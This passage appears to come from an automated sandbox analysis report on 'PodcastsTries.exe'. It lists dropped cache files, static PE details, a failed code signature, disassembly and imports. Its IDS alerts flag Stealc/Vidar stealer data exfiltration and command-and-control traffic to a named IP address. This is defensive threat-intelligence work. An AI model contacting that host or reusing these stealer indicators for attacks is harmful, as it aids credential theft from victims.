                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130866
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                        MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                        SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                        SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                        SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 406

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3473)
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):3478
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.835150817177106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:uPliuDH6666gFvBbiw4iAnCdG/L3YXC6New29a5fffQfo:ut9DH6666Mkw4iAnCdGDoy6Nmq
                                                                                                                                                                                                                                                                                                        MD5:A95A2247624A55DE75966F38BBC6274B
                                                                                                                                                                                                                                                                                                        SHA1:E2D24147DC72A56ACAB019472B3C3704CE2DFAD8
                                                                                                                                                                                                                                                                                                        SHA-256:6BFB355EA5D1C0160074A5146E9006B2873C8A26AB6A7599650F1C67D2BCC218
                                                                                                                                                                                                                                                                                                        SHA-512:1A8A59AB3EE3FAD2A12B00DD082F021BD093D7F8D820C9ABD83FE003772A9F1CBBDEFCD5925184170441D0BA88DDF0EA4D0F6B5DE20FBBE726F6DAED9A3911DF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                        Preview:)]}'.["",["college football playoff","james gunn flash","barstool sports baltimore pizza","nintendo switch 2 console","lane kiffin","paris eiffel tower fire","fincen boi reporting injunction","the odyssey film christopher nolan"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wYjRseTcSDkZvb3RiYWxsIGNvYWNoMscOZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ0lEQUFBQUFBQUFBQUFBQUFBRkJnUUhBUU1BQWdqL3hBQTBFQUFCQXdNQkJnTUhBZ2NBQUFBQUFBQUJBZ01FQUFVUklRWVNFekZCVVJRaVlRZENjWUdSb2NFeThCWWpOSEtDc2VIL3hB

                                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 407

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                        MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                        Chrome Cache Entry: 408

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                        Size (bytes):132738
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.436566301078923
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:fjkJQ7O4N5dTm+syHEt4W3XdQ4Q6/uSr/nUW2i6o:fWQ7HTt/sHdQ4Q6/DfUW8o
                                                                                                                                                                                                                                                                                                        MD5:99E3BDA5CC2977810323C58D84CB8719
                                                                                                                                                                                                                                                                                                        SHA1:BDAE8C8538EDFCC4F98F17BABF9B92927F447509
                                                                                                                                                                                                                                                                                                        SHA-256:BF2E58218B2829F5E42B5AF1B9CA56C44D63EE44B36A74513AC8E624C7630602
                                                                                                                                                                                                                                                                                                        SHA-512:625BB771944898F637B718516AC024F9C42300A657E13FDAECA92964DBA394A1AF4CF9C496F584D681BE114EE3C49390193CECF351E0D1718B78151627524585
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.964933747043997
                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                        File name:PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File size:1'259'108 bytes
                                                                                                                                                                                                                                                                                                        MD5:20bef33e4a0add922ae043e2aed13ea2
                                                                                                                                                                                                                                                                                                        SHA1:4d0353be8234f56862b7ea7ece4ded3eeef91cbb
                                                                                                                                                                                                                                                                                                        SHA256:847c28adfa050608203f206d31cce27f1f27e89ab138908473c8c69ccf388ca2
                                                                                                                                                                                                                                                                                                        SHA512:7a387b96497c0026d01820e586e4d0a9686b9927c3270a18170a1e5c138dc8bbee759bed63058fdc865a613956ca7258f7058a6fff78a156f85d6d9a8421c469
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Fx9yUoL9cVIpol/OQy1HvVrQaygJy/LilXabJUbsVF1M2/y:X9loLhpWIHtUvgyz4KbJYsVzy
                                                                                                                                                                                                                                                                                                        TLSH:65452352432C9467E7EB9AF1B0F09917A13AFD1514BACACF3749B9443D31B910E1AB23
                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                        Icon Hash:fef0f2fed6daca81

                                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                                                                        Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                                                                        • 24/06/2022 09:22:08 14/04/2025 16:06:58
                                                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                                                        • OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
                                                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                                                        Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
                                                                                                                                                                                                                                                                                                        Serial:115BBE9E1C286827AF66E7A01390C206

                                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                        call 00007FC114C77C1Bh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 0040A264h
                                                                                                                                                                                                                                                                                                        call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                        push 0040A24Ch
                                                                                                                                                                                                                                                                                                        push 00476AA0h
                                                                                                                                                                                                                                                                                                        call 00007FC114C778FDh
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        call 00007FC114C778EBh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                        cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                        mov eax, edi
                                                                                                                                                                                                                                                                                                        jne 00007FC114C751EAh
                                                                                                                                                                                                                                                                                                        push 00000022h
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call 00007FC114C775C1h
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                        jmp 00007FC114C75273h
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                                                                        cmp ax, bx
                                                                                                                                                                                                                                                                                                        jne 00007FC114C751EAh
                                                                                                                                                                                                                                                                                                        add esi, 02h
                                                                                                                                                                                                                                                                                                        cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                        • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x63376.rsrc
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1311940x24d0.rsrc
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                        .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                        .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                        .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                        .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                        .rsrc0x1000000x633760x63400346d0336f3db87ca7b18657d2c3b5e20False0.9779424787468514data7.912454550393707IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                        .reloc0x1640000xfd60x10009fc48c1dd505e9e157908dde45bfb0ceFalse0.567138671875data5.306627890676661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                        RT_ICON0x1002c80x56b38PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9934924872158771
                                                                                                                                                                                                                                                                                                        RT_ICON0x156e000x5ac5PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006885570426476
                                                                                                                                                                                                                                                                                                        RT_ICON0x15c8c80x2676PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011172049563275
                                                                                                                                                                                                                                                                                                        RT_ICON0x15ef400x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.6155410903173312
                                                                                                                                                                                                                                                                                                        RT_ICON0x1615a80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.7021857923497268
                                                                                                                                                                                                                                                                                                        RT_ICON0x1626d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.851063829787234
                                                                                                                                                                                                                                                                                                        RT_DIALOG0x162b380x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                        RT_DIALOG0x162c380x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                        RT_DIALOG0x162d540x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x162db40x5adataEnglishUnited States0.7777777777777778
                                                                                                                                                                                                                                                                                                        RT_VERSION0x162e100x290MS Windows COFF PA-RISC object fileEnglishUnited States0.5137195121951219
                                                                                                                                                                                                                                                                                                        RT_MANIFEST0x1630a00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                        2024-12-24T19:27:44.693699+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.649806188.245.216.205443TCP
                                                                                                                                                                                                                                                                                                        2024-12-24T19:27:47.008486+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.649812188.245.216.205443TCP
                                                                                                                                                                                                                                                                                                        2024-12-24T19:27:49.377028+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1188.245.216.205443192.168.2.649818TCP
                                                                                                                                                                                                                                                                                                        2024-12-24T19:27:51.679968+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11188.245.216.205443192.168.2.649824TCP

                                                                                                                                                                                                                                                                                                        Network Port Distribution

